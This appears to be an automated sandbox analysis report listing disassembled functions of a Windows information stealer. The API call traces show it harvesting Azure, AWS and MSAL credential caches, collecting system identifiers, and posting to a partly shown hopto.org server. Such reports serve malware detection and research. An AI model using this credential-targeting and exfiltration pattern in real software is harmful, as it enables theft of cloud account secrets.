                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0092510F
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0092516C
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00925177
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0092518E
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0092519A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                              • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                                              • API String ID: 3006978581-3960666492
                                                                                                                                                                                                              • Opcode ID: 8dde77cf60def045897e61163cd8f7f8e3471e0e03b8dc670e48c06da1d62122
                                                                                                                                                                                                              • Instruction ID: 550b23564d7980ea42677a65b01a83aac03929cd7054b1e238de19b8c53c207b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dde77cf60def045897e61163cd8f7f8e3471e0e03b8dc670e48c06da1d62122
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87027F3195512A9BCB21EB21DD52BDDB7B4FF88704F0581E1A58C77126CA74BE8A8FC0
                                                                                                                                                                                                              Function 009317DC Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 009317E3
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,0000004C,00933F39,Install Date: ,009568B8,00000000,Windows: ,009568A8,Work Dir: In memory,00956890), ref: 009317F4
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00931805
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00952F00,00000000,00000001,00952E30,?), ref: 0093181F
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00931855
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 009318B0
                                                                                                                                                                                                                • Part of subcall function 0093172C: __EH_prolog3_catch.LIBCMT ref: 00931733
                                                                                                                                                                                                                • Part of subcall function 0093172C: CoCreateInstance.OLE32(009531B0,00000000,00000001,0095B008,?,00000018,009318D6,?), ref: 00931756
                                                                                                                                                                                                                • Part of subcall function 0093172C: SysAllocString.OLEAUT32(?), ref: 00931763
                                                                                                                                                                                                                • Part of subcall function 0093172C: _wtoi64.MSVCRT ref: 00931796
                                                                                                                                                                                                                • Part of subcall function 0093172C: SysFreeString.OLEAUT32(?), ref: 009317AF
                                                                                                                                                                                                                • Part of subcall function 0093172C: SysFreeString.OLEAUT32(00000000), ref: 009317B6
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 009318DF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009318EB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 009318F2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00931931
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0093191E
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                              • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                              • API String ID: 2280294774-461178377
                                                                                                                                                                                                              • Opcode ID: a7c03c6bccf3f4434c161c24df14ae52a67109bb47d56623921b691368e9cdad
                                                                                                                                                                                                              • Instruction ID: d402f0c091317aa4c1ef5f5cb8f8899c0d16ff408780ace1feef52ac953a71ad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7c03c6bccf3f4434c161c24df14ae52a67109bb47d56623921b691368e9cdad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16414B71900209BBDB10DBD6EC89EEFBBBDEFC9B12F104109FA11A71A0D6749945DB20
                                                                                                                                                                                                              Function 009364FF Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00936524
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00936543
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,\.azure\), ref: 00936560
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093605A
                                                                                                                                                                                                                • Part of subcall function 00936013: FindFirstFileA.KERNEL32(?,?), ref: 00936071
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956ABC), ref: 00936092
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956AC0), ref: 009360AC
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 009360D3
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956647), ref: 009360E7
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 00936104
                                                                                                                                                                                                                • Part of subcall function 00936013: PathMatchSpecA.SHLWAPI(?,?), ref: 00936131
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?), ref: 00936167
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956AD8), ref: 00936179
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 0093618C
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956ADC), ref: 0093619E
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 009361B2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00936598
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 009365BA
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,\.aws\), ref: 009365D7
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093611B
                                                                                                                                                                                                                • Part of subcall function 00936013: CopyFileA.KERNEL32(?,?,00000001), ref: 0093626B
                                                                                                                                                                                                                • Part of subcall function 00936013: DeleteFileA.KERNEL32(?), ref: 009362DF
                                                                                                                                                                                                                • Part of subcall function 00936013: FindNextFileA.KERNEL32(?,?), ref: 00936341
                                                                                                                                                                                                                • Part of subcall function 00936013: FindClose.KERNEL32(?), ref: 00936355
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0093660C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0093662E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 0093664B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00936680
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                              • API String ID: 780282842-974132213
                                                                                                                                                                                                              • Opcode ID: 1cea680ef1f4f1c60589307a6c8d8d82eaf1430a3907923e81f349e725ad20d4
                                                                                                                                                                                                              • Instruction ID: 343487225bceb242ad313f077312f262ab0d0080b6b299fa32b23a5a402ac258
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cea680ef1f4f1c60589307a6c8d8d82eaf1430a3907923e81f349e725ad20d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D41B175D4021C6ADB25FB60EC47FED736CAF89314F4444D5BA18E3091DAB0AA888F51
                                                                                                                                                                                                              Function 0092ABBA Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092AC5F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092AD69
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0092AD70
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009573D4,00000000), ref: 0092AE21
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009573D8), ref: 0092AE49
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AE6D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573DC), ref: 0092AE79
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AE83
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573E0), ref: 0092AE8F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AE99
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573E4), ref: 0092AEA5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AEAF
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573E8), ref: 0092AEBB
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AEC5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573EC), ref: 0092AED1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AEDB
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573F0), ref: 0092AEE7
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AEF1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573F4), ref: 0092AEFD
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092AF4F
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092AF6A
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092AFAD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1956182324-0
                                                                                                                                                                                                              • Opcode ID: 2349d313cf734c82f074f9a643cdfad694f76c2a9e5e0fb7cd5fd4ac7b9e5c6a
                                                                                                                                                                                                              • Instruction ID: 218da93f570081c48a6f6624b922cddafc08e8449a1536ed8e2e3c99e9f7c895
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2349d313cf734c82f074f9a643cdfad694f76c2a9e5e0fb7cd5fd4ac7b9e5c6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82C11932904118ABDF06BBA0FD4AADDBB74EF88705F114065F905B7066DF31AE869F50
                                                                                                                                                                                                              Function 009371CD Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00930C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009213B9), ref: 00930C34
                                                                                                                                                                                                                • Part of subcall function 00930C28: HeapAlloc.KERNEL32(00000000,?,?,?,009213B9), ref: 00930C3B
                                                                                                                                                                                                                • Part of subcall function 00930C28: GetUserNameA.ADVAPI32(00000000,009213B9), ref: 00930C4F
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0093871B), ref: 00937269
                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,?,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00937278
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,009566D6), ref: 00937796
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00937857
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00937870
                                                                                                                                                                                                                • Part of subcall function 00924B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00924BCD
                                                                                                                                                                                                                • Part of subcall function 00924B2E: StrCmpCA.SHLWAPI(?), ref: 00924BEB
                                                                                                                                                                                                                • Part of subcall function 00933A02: StrCmpCA.SHLWAPI(?,block,?,?,009378D0), ref: 00933A17
                                                                                                                                                                                                                • Part of subcall function 00933A02: ExitProcess.KERNEL32 ref: 00933A22
                                                                                                                                                                                                                • Part of subcall function 00925F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00925FD8
                                                                                                                                                                                                                • Part of subcall function 00925F39: StrCmpCA.SHLWAPI(?), ref: 00925FF6
                                                                                                                                                                                                                • Part of subcall function 009331D8: strtok_s.MSVCRT ref: 009331F7
                                                                                                                                                                                                                • Part of subcall function 009331D8: strtok_s.MSVCRT ref: 0093327A
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00937C26
                                                                                                                                                                                                                • Part of subcall function 00925F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0092618E
                                                                                                                                                                                                                • Part of subcall function 00925F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 009261D2
                                                                                                                                                                                                                • Part of subcall function 00925F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926200
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0093871B), ref: 0093728C
                                                                                                                                                                                                                • Part of subcall function 00932554: __EH_prolog3_catch_GS.LIBCMT ref: 0093255E
                                                                                                                                                                                                                • Part of subcall function 00932554: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00937FBD,.exe,00956CD4,00956CD0,00956CCC,00956CC8,00956CC4,00956CC0,00956CBC,00956CB8,00956CB4,00956CB0,00956CAC), ref: 0093257D
                                                                                                                                                                                                                • Part of subcall function 00932554: Process32First.KERNEL32(00000000,00000128), ref: 0093258D
                                                                                                                                                                                                                • Part of subcall function 00932554: Process32Next.KERNEL32(00000000,00000128), ref: 0093259F
                                                                                                                                                                                                                • Part of subcall function 00932554: StrCmpCA.SHLWAPI(?), ref: 009325B1
                                                                                                                                                                                                                • Part of subcall function 00932554: CloseHandle.KERNEL32(00000000), ref: 009325C5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0093818C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                                              • String ID: .exe$.exe$65158feadb3cebfa5c9a9e36f0d461fe$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                                                                                                              • API String ID: 305159127-1829170389
                                                                                                                                                                                                              • Opcode ID: 6319fd0fbb30112c47887935b460b4f857b2ec47236c5eab37251460088f59fb
                                                                                                                                                                                                              • Instruction ID: c8c0c31c405fca7bf9cd500b39b40950387d5692b52e721ef85e6f375790dcb0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6319fd0fbb30112c47887935b460b4f857b2ec47236c5eab37251460088f59fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 839229315483559BC620FF25D942B8EB7E4FFC4704F81492AF9C467166DB70AA4A8F83
                                                                                                                                                                                                              Function 009335E8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0093362A
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,true), ref: 009336EC
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 009337AE
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 009337DF
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 0093381B
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 00933857
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 00933893
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 009338CF
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 0093390B
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 009339CF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                                              • API String ID: 2116072422-2658103896
                                                                                                                                                                                                              • Opcode ID: a981b38e6e759d1d399f0d25519d51602f7862ded07dbb41a14a7b9f69d07fde
                                                                                                                                                                                                              • Instruction ID: 06a1fc66c01d5e01153be49b371e92296ae8edba348bf7651d4486fa0fad7bf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a981b38e6e759d1d399f0d25519d51602f7862ded07dbb41a14a7b9f69d07fde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35B11575900228ABCF65EB64DC89BDA77B9BF58304F1045E5E44AA7261EF70ABC4CF40
                                                                                                                                                                                                              Function 00925237 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
